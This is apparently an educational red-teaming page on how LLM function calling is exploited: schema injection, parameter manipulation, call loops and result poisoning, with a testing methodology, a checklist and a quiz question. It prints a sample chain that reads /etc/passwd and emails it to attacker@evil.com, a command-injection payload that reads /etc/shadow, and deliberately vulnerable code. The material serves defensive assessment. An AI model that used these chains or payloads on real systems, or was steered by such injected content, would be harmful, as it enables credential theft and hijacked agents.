Function Calling Exploitation
Overview of how LLM function/tool calling works, the attack surface it creates, and systematic approaches to exploiting function calling interfaces in AI systems.
Function Calling Exploitation
Function calling -- also referred to as tool use -- is the mechanism by which LLMs interact with external systems. Rather than generating free-text responses, the model outputs structured JSON specifying a function name and parameters. An orchestration layer executes the function and returns results to the model. This capability transforms a language model from a text generator into an autonomous agent, and every function registered with the model becomes an attack surface.
How Function Calling Works
The function calling pipeline has four stages, each with distinct security implications:
| Stage | What Happens | Attack Surface |
|---|---|---|
| Registration | Developer defines function schemas (name, description, parameters, types) | Schema injection: malicious content in descriptions or parameter definitions |
| Selection | Model decides which function to call based on conversation context | Selection manipulation: steering the model to call unintended functions |
| Invocation | Orchestration layer executes the function with model-generated parameters | Parameter manipulation: crafting malicious values that exploit downstream systems |
| Return | Function results are fed back into the model's context | Result poisoning: injecting instructions via return values to influence subsequent behavior |
The Function Calling Attack Surface
Provider Implementations
Different providers implement function calling with varying security characteristics:
| Provider | Implementation | Key Difference |
|---|---|---|
| OpenAI | tools parameter with JSON Schema definitions | Supports strict: true for enforced schema validation |
| Anthropic | tools array with input_schema definitions | Tool use results are sent as tool_result content blocks |
| Google (Gemini) | function_declarations with OpenAPI-style schemas | Supports NONE, AUTO, and ANY tool calling modes |
| Open-source (Llama, Mistral) | Provider-dependent, often via special tokens | Schema enforcement varies widely; many have no validation |
Attack Classification
Function calling attacks fall into four categories, each targeting a different pipeline stage:
1. Schema Injection -- Manipulating the function definitions themselves to alter model behavior. The model treats schema descriptions as trusted instructions, so adversarial content in descriptions can redirect behavior across all subsequent calls. See Schema Injection.
2. Parameter Manipulation -- Crafting inputs that cause the model to generate malicious parameter values. Type confusion, boundary violations, and injection through parameter values can compromise downstream systems. See Parameter Manipulation.
3. Recursive/Infinite Calling -- Triggering loops where the model repeatedly calls functions, exhausting resources or creating race conditions. Call chain manipulation can cause exponential function invocations. See Recursive Function Calling.
4. Result Poisoning -- Injecting adversarial content in function return values to hijack subsequent model behavior. Since results feed directly into the model's context, they are a powerful indirect injection vector. See Result Poisoning.
Methodology: Assessing Function Calling Security
Enumerate the function surface
Identify all registered functions, their descriptions, parameter schemas, and permission levels. Determine which functions read data vs. write data vs. execute code. Map the trust level of each function's output.
Test schema manipulation
Attempt to influence function selection and behavior through adversarial content in user messages that mimics schema formatting. Test whether the application dynamically generates schemas from user-controlled content.
Probe parameter boundaries
For each function, test type confusion (strings where numbers are expected), boundary values (extremely long strings, negative numbers, special characters), and injection payloads (SQL, command injection, path traversal) in parameter values.
Test call chain behavior
Verify whether the model can be induced to call the same function repeatedly, call functions in unintended sequences, or generate function calls that reference other function calls.
Assess result handling
Inject adversarial instructions in function return values and observe whether the model follows them. Test whether results from low-trust functions can influence calls to high-trust functions.
Evaluate orchestration controls
Determine whether the orchestration layer validates parameters before execution, enforces rate limits, implements approval workflows for sensitive functions, and sanitizes results before feeding them back to the model.
Common Vulnerable Patterns
Several implementation patterns consistently lead to function calling vulnerabilities:
Dynamic Schema Generation
Applications that build function schemas from user-controlled data (e.g., database column names, API endpoint descriptions) allow attackers to inject adversarial content directly into function definitions:
# VULNERABLE: Schema built from user-controlled database column names
def build_schema(table_name):
columns = db.get_columns(table_name) # User-controlled
return {
"name": f"query_{table_name}",
"description": f"Query the {table_name} table",
"parameters": {
col.name: {"type": col.type, "description": col.description}
for col in columns # Descriptions may contain injection
}
}Unrestricted Function Chaining
Applications that allow the model to call unlimited functions without human approval enable escalation chains where low-privilege reads lead to high-privilege writes:
web_search("topic") -> read_file("/etc/passwd") -> send_email(to="attacker@evil.com", body=contents)
Unvalidated Parameter Pass-Through
Applications that pass model-generated parameters directly to system calls without validation are vulnerable to classic injection attacks (SQL injection, command injection, SSRF) through the function calling interface:
# VULNERABLE: Direct parameter pass-through
def search_files(query: str):
return os.popen(f"grep -r '{query}' /data/").read()
# Model can generate: query = "'; cat /etc/shadow; echo '"Red Team Checklist
Use this checklist when assessing a function calling implementation:
- Can function schemas be influenced by user-controlled data?
- Are parameter values validated against their declared types and constraints?
- Is there a maximum call depth or rate limit on function invocations?
- Do function results pass through sanitization before entering the model context?
- Are sensitive functions gated behind human approval or elevated authentication?
- Can the model be induced to call functions in unintended sequences?
- Does the orchestration layer log function calls for anomaly detection?
- Are error messages from functions sanitized to prevent injection?
Related Topics
- Schema Injection -- Manipulating function definitions to alter model behavior
- Parameter Manipulation -- Crafting malicious parameter values
- Recursive Function Calling -- Resource exhaustion via call loops
- Result Poisoning -- Hijacking behavior through return values
- MCP Tool Exploitation -- Related attacks on the Model Context Protocol tool interface
An application dynamically generates function schemas from a database where column descriptions are editable by end users. Which attack class does this enable?
References
- OpenAI, "Function Calling" API documentation (2024)
- Anthropic, "Tool Use" API documentation (2024)
- Fang et al., "LLM Agents can Autonomously Exploit One-day Vulnerabilities" (2024)
- OWASP Top 10 for LLM Applications v2.0 -- LLM07: Insecure Plugin Design
- Debenedetti et al., "AgentDojo: A Dynamic Environment to Evaluate Attacks and Defenses for LLM Agents" (2024)